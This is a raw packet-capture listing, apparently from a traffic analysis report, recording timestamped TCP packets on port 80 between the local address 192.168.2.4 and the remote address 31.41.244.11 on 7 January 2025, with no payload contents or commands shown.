Jan 7, 2025 10:09:06.053150892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053159952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053170919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053181887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053201914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053201914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053234100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053392887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053404093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053412914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053436995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053447008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053455114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053472042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053513050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053515911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053524971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053534985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053560019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053585052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053745985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053756952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053767920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053777933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053787947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053797960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053803921 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053807974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.053828001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.053857088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.054795980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.054821968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.054837942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.054850101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.054850101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.054861069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.054894924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.054898977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.054915905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.054915905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.054944038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.054954052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.054956913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.054956913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.054965019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.054974079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.054999113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055013895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055026054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055037022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055068970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055078983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055089951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055099010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055107117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055133104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055157900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055172920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055182934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055187941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055223942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055233955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055237055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055246115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055264950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055299997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055368900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055386066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055397034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055404902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055413961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055417061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055464983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055464983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055468082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055480957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055490017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055500984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055510998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055521011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055521965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055552006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055563927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055589914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055600882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055610895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055648088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055661917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055671930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055680990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055681944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055733919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055733919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055783033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055793047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055802107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055811882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055825949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055835962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055839062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055847883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055874109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055874109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055900097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055915117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055926085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055933952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055969000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.055970907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055983067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.055993080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.056004047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.056005955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.056005955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.056045055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.087474108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087527990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087538958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087548971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087555885 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.087590933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.087590933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.087621927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087634087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087645054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087663889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.087671041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087681055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087690115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087692976 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.087701082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087739944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.087758064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.087822914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087833881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087871075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087881088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087888956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087898970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087908983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087910891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.087910891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.087920904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.087964058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.087997913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.088020086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.088031054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.088041067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.088049889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.088059902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.088063002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.088098049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.088150024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.106674910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.106689930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.106702089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.106756926 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.106766939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.106794119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.106797934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.106812000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.106823921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.106827974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.106842995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.106862068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.106895924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141019106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141030073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141040087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141100883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141141891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141176939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141187906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141197920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141206980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141216993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141222954 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141252041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141269922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141280890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141290903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141299963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141314030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141314030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141314030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141325951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141326904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141386032 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141386986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141412973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141423941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141428947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141433954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141485929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141529083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141540051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141545057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141555071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141560078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141565084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141577959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141590118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141592979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141602039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141612053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141627073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141627073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141645908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141810894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141822100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141830921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141839981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141849995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141860008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.141860962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141902924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.141933918 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142126083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142134905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142144918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142154932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142163992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142173052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142174959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142188072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142196894 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142199039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142210007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142220020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142227888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142237902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142244101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142244101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142249107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142280102 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142306089 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142440081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142450094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142460108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142472029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142482996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142493010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142503023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142503977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142525911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142550945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142658949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142669916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142678976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142687082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142698050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142708063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142716885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142721891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142721891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142723083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142736912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142765999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142824888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.142963886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142973900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142982960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.142992973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143002987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143013000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143013000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.143028975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143038988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143039942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.143052101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143063068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143065929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.143073082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143083096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143093109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.143104076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143116951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143117905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.143122911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143132925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143143892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143152952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143162012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.143165112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143196106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.143196106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.143258095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.143264055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143274069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143282890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143294096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143304110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.143328905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.143338919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174264908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174336910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174348116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174396992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174407959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174413919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174417019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174426079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174474955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174474955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174513102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174524069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174535036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174546003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174557924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174571991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174571991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174599886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174612045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174612999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174655914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174665928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174665928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174676895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174700022 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174760103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174766064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174772978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174786091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174797058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174808025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.174808979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174808979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174870014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.174870014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.193384886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.193397045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.193408012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.193447113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.193480968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.193483114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:06.193495989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.193506956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.193532944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.193546057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:06.193547010 CET	50017	80	192.168.2.4	31.41.244.11
